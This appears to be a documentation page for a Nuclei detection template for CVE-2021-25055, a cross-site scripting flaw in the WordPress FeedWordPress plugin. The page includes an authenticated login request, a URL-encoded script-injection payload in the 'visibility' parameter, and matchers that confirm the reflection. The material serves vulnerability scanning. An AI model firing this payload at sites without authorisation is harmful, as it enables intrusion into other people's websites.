WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting
ID: CVE-2021-25055
Severity: medium
Author: DhiyaneshDK
Tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project
Description
Section titled “Description”The plugin is affected by a cross-site scripting vulnerability within the “visibility” parameter.
YAML Source
Section titled “YAML Source”id: CVE-2021-25055
info: name: WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting author: DhiyaneshDK severity: medium description: | The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055 - https://plugins.trac.wordpress.org/changeset/2662665 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.41295 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: feedwordpress_project product: feedwordpress framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "<img src=1 onerror=alert(document.domain)>"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100d3c14adb581ff75caf0683cf5b99f1207e4deb081b0b38c4e99d6a217794affd022001686da32ef6ce18d1efe577ced34f0ced017c361218cc780fcbaaa6a1055669:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25055.yaml"